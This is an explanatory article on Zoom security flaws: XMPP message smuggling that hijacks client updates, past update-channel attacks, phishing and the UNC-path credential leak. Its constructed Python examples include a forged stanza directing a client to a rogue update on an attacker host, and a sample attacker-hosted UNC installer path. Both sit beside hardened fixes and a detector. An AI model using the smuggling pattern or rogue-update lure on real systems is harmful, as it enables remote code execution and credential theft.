This week, the University of Chicago and Zoom have teamed up to tighten security and change default settings. The university's information technology department is holding training sessions for instructors, and Zoom has updated its guidelines for locking down meetings. Many users say they never expected Zoom to be a target. One of the university's information technology officers, Dr. Santina Wheat, was on a Zoom call last week, and she said she had never thought about the service being hacked.
Exploiting Zoom’s chat functionality:
A recent study uncovered a number of vulnerabilities in Zoom, several of them in the chat functionality, which runs over XMPP (Extensible Messaging and Presence Protocol). By sending crafted XMPP messages, an attacker masquerading as an ordinary Zoom user could compromise another user's client and make it download an attacker-controlled update; once that succeeds, the attacker can execute arbitrary code on the targeted computer. The root cause is a set of parsing inconsistencies between Zoom's chat client and server: a message the server accepts as harmless is interpreted differently by the client, and that gap can be weaponized to subvert the software update mechanism.
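The following is an added, constructed illustration of that class of bug; it is not Zoom's protocol, the study's proof of concept, or any Zoom code. The JIDs, the `<update>` element and the URL are hypothetical. A weak server authorises a chat stanza by regex on the raw text and forwards the bytes untouched, so a second stanza hidden after the first `</message>` reaches the client looking as if it came from a privileged control address. The hardened server parses with a strict XML parser, rejects any frame that does not contain exactly one stanza, stamps the authenticated sender itself, and re-serialises before forwarding.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Constructed toy protocol: these JIDs, the <update> element and the URL are
# hypothetical and are not Zoom's real XMPP schema.
ATTACKER_JID = "attacker@chat.example"
VICTIM_JID = "victim@chat.example"
CONTROL_JID = "control@chat.example"  # privileged sender the client trusts for updates
ROGUE_URL = "http://updates.attacker.example/client.exe"

# One "stanza" as the attacker's client sends it: the text closes the attacker's
# <message> early and opens a second one that claims to come from CONTROL_JID.
SMUGGLED = (
    f'<message from="{ATTACKER_JID}" to="{VICTIM_JID}"><body>hi</body></message>'
    f'<message from="{CONTROL_JID}" to="{VICTIM_JID}"><update url="{ROGUE_URL}"/></message>'
)
# A cruder attempt: a single stanza with a forged from attribute.
FORGED = f'<message from="{CONTROL_JID}" to="{VICTIM_JID}"><update url="{ROGUE_URL}"/></message>'

FROM_RE = re.compile(r'^<message[^>]*\sfrom="([^"]+)"')


def naive_server_forward(raw: str, authenticated_jid: str) -> Optional[str]:
    """Weak server: authorises by regex on the raw text, then forwards the bytes
    untouched. It only ever looks at the first opening tag, so it never notices
    the second stanza hidden after the first </message>."""
    m = FROM_RE.match(raw)
    if not m or m.group(1) != authenticated_jid:
        return None
    return raw


def hardened_server_forward(raw: str, authenticated_jid: str) -> Optional[str]:
    """Hardened server: parse with a strict XML parser, require exactly one
    stanza, stamp the authenticated sender itself, and re-serialise so the
    client receives exactly what the server parsed and nothing more."""
    try:
        stream = ET.fromstring(f"<stream>{raw}</stream>")
    except ET.ParseError:
        return None
    if len(stream) != 1 or stream[0].tag != "message":
        return None  # more than one stanza (or not a message) in one frame: reject
    stanza = stream[0]
    stanza.set("from", authenticated_jid)  # never trust a client-supplied 'from'
    return ET.tostring(stanza, encoding="unicode")


def client_parse(forwarded: str) -> List[Tuple[str, Optional[str]]]:
    """Client side: an XMPP stream is one root element with stanzas as children,
    so consecutive <message> elements become siblings. Returns (from, update_url)."""
    root = ET.fromstring(f"<stream>{forwarded}</stream>")
    out = []
    for stanza in root:
        upd = stanza.find("update")
        out.append((stanza.get("from"), upd.get("url") if upd is not None else None))
    return out


def client_update_url(forwarded: str) -> Optional[str]:
    """The client only acts on an <update> that appears to come from CONTROL_JID."""
    for sender, url in client_parse(forwarded):
        if sender == CONTROL_JID and url:
            return url
    return None


if __name__ == "__main__":
    via_naive = naive_server_forward(SMUGGLED, ATTACKER_JID)
    print("naive server, client would fetch:", client_update_url(via_naive))  # ROGUE_URL
    print("hardened server on smuggled frame:", hardened_server_forward(SMUGGLED, ATTACKER_JID))  # None
    via_hardened = hardened_server_forward(FORGED, ATTACKER_JID)
    print("hardened server, client would fetch:", client_update_url(via_hardened))  # None
```

The forged single stanza is caught by both servers, but only the hardened one survives the smuggled frame, because it makes the same parser decide both the authorisation and what gets forwarded. That is the general fix for client/server parser differentials: canonicalise on the trusted side and never forward bytes you did not fully parse.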
A compromised client is especially harmful for businesses, where a single malicious participant could take control of an entire Zoom meeting, record it, and gather information from it. That could lead to corporate espionage or even blackmail. Zoom has patched this problem, but users running out-of-date clients remain exposed, and malware delivered by other routes remains a risk.
Attempting to hijack the software update mechanism:
Attackers have repeatedly targeted trusted software update mechanisms. The best-known example is the cyberespionage malware Flame, detected in 2012, which spread across local networks by posing as a Windows Update server: its components were signed with a certificate that chained to Microsoft's root, obtained by abusing a Microsoft Terminal Server Licensing certificate (with the help of an MD5 collision) rather than by breaching Microsoft. The attackers therefore never compromised Microsoft's update servers; they intercepted update traffic on the victim's network and redirected the update tool to a malicious server. Stuxnet, discovered in 2010, is a related lesson in abused trust: its drivers were signed with code-signing certificates stolen from legitimate hardware vendors, although it did not attack Windows Update itself.
While updating software is rightly regarded as a best practice, state actors have a long history of attacking the software supply chain. In the Dragonfly 2.0 case, attackers distributed trojanized copies of legitimate software while impersonating trusted third-party vendors, so that victims installed malware when they believed they were updating. These attacks follow a long-term pattern and have become a sophisticated distribution vector. The policy community should work closely with the software industry to address the problem and protect users.
Sending malware to users:
Security experts have warned that attackers are sending malicious messages that impersonate Zoom. They use spoofed emails and phishing sites to harvest users' account credentials. Be wary of any email that asks you to follow a link and enter your login details. If an email claims to come from Zoom, check the sender's address and the destination of the link carefully, and rather than clicking the link, type the official Zoom URL into your browser and sign in there.
Attackers have also used the popularity of the Zoom platform to spread malware and spyware, packaging it as fake Zoom apps and installers that trick users into infecting their own computers. Separately, a flaw in the Windows client's chat converted UNC paths (such as \\server\share\file.exe) into clickable links; clicking one made Windows open an SMB connection to the remote host, which leaks the user's NTLM credentials, and could launch the remote executable after a Windows prompt. Zoom fixed this shortly after it was publicly reported. Users should nevertheless keep the client updated, stay vigilant, and run up-to-date antivirus software to detect malware and spyware.
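As an added example (not Zoom's code, and a simplified model of the behaviour described above), the block below contrasts a chat linkifier that turns UNC paths into clickable links with a hardened one that only links http(s) URLs, and adds the check a SOC or DLP filter would want: which UNC paths in a message point at hosts outside the private address space. The sample chat lines and host names are constructed.

```python
import ipaddress
import re
from typing import List, Tuple

# Constructed chat lines (not captured Zoom traffic); the hosts are hypothetical.
SAMPLE_LINES = [
    "agenda: https://intranet.example/handbook",
    r"the new build is at \\files.attacker.example\share\ZoomInstaller.exe",
    r"minutes on \\10.0.0.5\minutes\2020-04.docx",
    "no links here",
]

HTTP_RE = re.compile(r'https?://[^\s<>"]+')
UNC_RE = re.compile(r"\\\\([^\s\\]+)\\[^\s]+")  # \\host\share\... ; group 1 is the host


def linkify_vulnerable(text: str) -> List[Tuple[str, str]]:
    """Modelled on the behaviour described above: any http(s) URL *or* UNC path
    becomes a clickable link. Following a UNC link makes Windows open an SMB
    connection to that host (sending the user's NTLM credentials) and can
    launch the remote executable."""
    links = [(m.group(0), "http") for m in HTTP_RE.finditer(text)]
    links += [(m.group(0), "unc") for m in UNC_RE.finditer(text)]
    return links


def linkify_hardened(text: str) -> List[Tuple[str, str]]:
    """Only http(s) URLs become links; UNC paths stay inert text."""
    return [(m.group(0), "http") for m in HTTP_RE.finditer(text)]


def external_unc_hosts(text: str) -> List[str]:
    """Detection helper: hosts named by UNC paths that are not private IP
    addresses. Bare short names (no dots) are assumed internal; that is an
    assumption for this example, resolve them against your own naming in practice."""
    hosts = []
    for m in UNC_RE.finditer(text):
        host = m.group(1)
        try:
            if ipaddress.ip_address(host).is_private:
                continue
        except ValueError:
            if "." not in host:
                continue  # bare NetBIOS-style name: assumed internal
        hosts.append(host)
    return hosts


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(repr(line))
        print("  vulnerable:", linkify_vulnerable(line))
        print("  hardened:  ", linkify_hardened(line))
        print("  external UNC hosts:", external_unc_hosts(line))
```

The second sample line is the dangerous case: the vulnerable linkifier offers the remote executable as a link, the hardened one offers nothing, and `external_unc_hosts` names the host an analyst would want to block at the egress firewall (outbound SMB on port 445 to the Internet should be blocked regardless of which client is at fault).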